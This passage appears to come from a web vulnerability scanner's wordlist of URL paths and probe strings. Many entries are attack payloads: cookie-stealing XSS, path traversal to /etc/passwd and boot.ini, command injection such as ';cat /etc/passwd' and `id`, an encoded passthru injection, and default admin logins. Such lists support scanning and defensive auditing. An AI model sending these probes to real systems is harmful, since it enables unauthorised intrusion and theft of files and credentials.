test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
test.txt
test/
test/info.php
test/jsp/Language.jsp
test/jsp/buffer1.jsp
test/jsp/buffer2.jsp
test/jsp/buffer3.jsp
test/jsp/buffer4.jsp
test/jsp/declaration/IntegerOverflow.jsp
test/jsp/extends1.jsp
test/jsp/extends2.jsp
test/jsp/pageAutoFlush.jsp
test/jsp/pageDouble.jsp
test/jsp/pageExtends.jsp
test/jsp/pageImport2.jsp
test/jsp/pageInfo.jsp
test/jsp/pageInvalid.jsp
test/jsp/pageIsErrorPage.jsp
test/jsp/pageIsThreadSafe.jsp
test/jsp/pageSession.jsp
test/phpinfo.php
test/realPath.jsp
test/test.cgi
testcgi.exe
testcgi.exe?<script>alert(document.cookie)</script>
testing/
tests/
texis.exe/?-dump
texis.exe/?-version
texis.exe/junk
texis/junk
texis/phine
texis/websearch/phine
textcounter.pl
thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\"><script>alert('Vulnerable')</script>,/system/status/session
theme1/selector?button=status,monitor,session&button_url=/system/status/status\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/status/session
theme1/selector?button=status,monitor,session\"><script>alert('Vulnerable')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session
themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>
ticket.php?id=99999
tidfinder.cgi
tigvote.cgi
tinymsg.php
title.cgi
tmp/
tmp_view.php?file=/etc/passwd
today.nsf
tomcat-docs/index.html
tools/
topic/entete.php
topsitesdir/edit.php
tpgnrock
tpv/
trabajo/
trace.axd
traffic.cgi?cfg=../../../../../../../../etc/passwd
trafficlog/
transito/
tree
tree/
trees/
troops.cgi
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
tsweb/
ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
ttawebtop.cgi/?action=start&pg=../../../../../../../../../../passwd
ttforum/index.php
ttp://127.0.0.1:2301/
tutos/file/file_new.php
tutos/file/file_select.php
tvcs/getservers.exe?action=selects1
typo3/typo3/dev/translations.php
typo3conf/
typo3conf/database.sql
typo3conf/localconf.php
uifc/MultFileUploadHandler.php+
ultraboard.cgi
ultraboard.pl
unlg1.1
unlg1.2
upd/
update.dpgs
updates/
upload.asp
upload.cgi
upload.cgi+
upload.php?type=\"<script>alert(document.cookie)</script>
uploader.php
uploadn.asp
uploadx.asp
uptime
url.jsp
urlcount.cgi?%3CIMG%20
urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
usage/
user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com
user.php?op=userinfo&uname=<script>alert('hi');</script>
user/
useraction.php3
usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)
userinfo.php?uid=1;
userlog.php
userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd
userreg.nsf
users.lst
users.nsf
users.php?mode=profile&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
users/
users/scripts/submit.cgi
ustats/
ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc
ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
usuario/
usuarios/
utils/sprc.asp
utils/sprc.asp+
utm/admin
utm/utm_stat
vars.inc+
vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
vc30/
vchat/msg.txt
vfs/
vgn/ac/data
vgn/ac/delete
vgn/ac/edit
vgn/ac/esave
vgn/ac/fsave
vgn/ac/index
vgn/asp/MetaDataUpdate
vgn/asp/previewer
vgn/asp/status
vgn/asp/style
vgn/errors
vgn/jsp/controller
vgn/jsp/errorpage
vgn/jsp/initialize
vgn/jsp/jspstatus
vgn/jsp/jspstatus56
vgn/jsp/metadataupdate
vgn/jsp/previewer
vgn/jsp/style
vgn/legacy/edit
vgn/legacy/save
vgn/license
vgn/login
vgn/login/1,501,,00.html?cookieName=x--\>
vgn/performance/TMT
vgn/performance/TMT/Report
vgn/performance/TMT/Report/XML
vgn/performance/TMT/reset
vgn/ppstats
vgn/previewer
vgn/record/previewer
vgn/style
vgn/stylepreviewer
vgn/vr/Deleting
vgn/vr/Editing
vgn/vr/Saving
vgn/vr/Select
vider.php3
view-source
view-source?view-source
view_item?HTML_FILE=../../../../../../../../../../etc
view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
view_source.jsp
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script>
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1
viewlogs.pl
viewpage.php?file=/etc/passwd
viewsource?/etc/passwd
viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
viralator.cgi
virgil.cgi
visadmin.exe
visitor.exe
vote.cgi
vpasswd.cgi
vpuserinfo.nsf
vq/demos/respond.pl?<script>alert('Vulnerable')</script>
vq/demos/respond.pl?<script>alert('XSS')</script>
w-agora/
w3-msql
w3-sql
w3perl/admin
wa.exe
wais.pl
warez/
way-board.cgi?db=/etc/passwd%00
way-board/way-board.cgi?db=/etc/passwd%00
wbboard/profile.php
wbboard/reply.php
wconsole.dll
web-console/ServerInfo.jsp%00
web.config
web.nsf
web/
web800fo/
webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif
webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif
web_app/WEB-INF/webapp.properties
webaccess.htm
webaccess/access-options.txt
webadmin.nsf
webadmin/
webais
webalizer/
webamil/test.php
webamil/test.php?mode=phpinfo
webapp/admin/_pages/_bc4jadmin/
webbbs.cgi
webbbs.exe
webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
webboard/
webcache/
webcache/webcache.xml
webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>
webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd
webcalendar/login.php
webcalendar/view_m.php
webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>
webcalendar/week.php?user=\"><script>alert(document.cookie)</script>
webcart-lite/
webcart-lite/config/import.txt
webcart-lite/orders/import.txt
webcart/
webcart/carts/
webcart/config/
webcart/config/clients.txt
webcart/orders/
webcart/orders/import.txt
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
webdata/
webdav/index.html
webdist.cgi?distloc=;cat%20/etc/passwd
webdriver
webfind.exe?keywords=01234567890123456789
webgais
webif.cgi
weblog/
weblogic
weblogs/
webmail/
webmail/blank.html
webmail/horde/test.php
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../..
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
webmail/lib/emailreader_execute_on_each_page.inc.php
webmail/src/read_body.php
webmap.cgi
webmaster_logs/
webnews.pl
webplus.exe?about
webplus?about
webplus?script=../../../../../../../../../../etc
webplus?script=../../../../../../../../../../etc/passwd
websendmail
website/
webspirs.cgi?sp.nextform=../../../../../../../../../../etc
webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
webstats/
webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>
webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
webtop/wdk/
webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef
webtop/wdk/samples/index.jsp
webuser.nsf
webutil.pl
webutils.pl
webwho.pl
welcome.nsf
wguest.exe
whatever.htr
whateverJUNK(4).html
where.pl?sd=ls%20/etc
whois.cgi?action=load&whois=%3Bid
whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
wikihome/action/conflict.php
windmail
windmail.exe
windows/
wksinst.nsf
word/
work/
wrap
wrap.cgi
ws_ftp.ini
wstats/
wusage/
www-sql
www-sql/
www/
wwwadmin.pl
wwwboard.cgi.cgi
wwwboard.pl
wwwboard/passwd.txt
wwwboard/wwwboard.cgi
wwwboard/wwwboard.pl
wwwjoin/
wwwlog/
wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>
wwwstats.html
wwwstats.pl
wwwstats/
wwwthreads/3tvars.pm
wwwthreads/w3tvars.pm
wwwwais
wx/s.dll?d=/boot.ini
x_stat_admin.php
xdk/
xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS
yabbse/Reminder.php
yabbse/Sources/Packages.php
z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&
zentrack/index.php
zipfiles/
zml.cgi?file=../../../../../../../../../../etc
zml.cgi?file=../../../../../../../../../../etc/passwd%00
zorum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
zsh
~/<script>alert('Vulnerable')</script>.asp
~/<script>alert('Vulnerable')</script>.aspx
~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null
~nobody/etc/passwd
Reference in New Issue View Git Blame Copy Permalink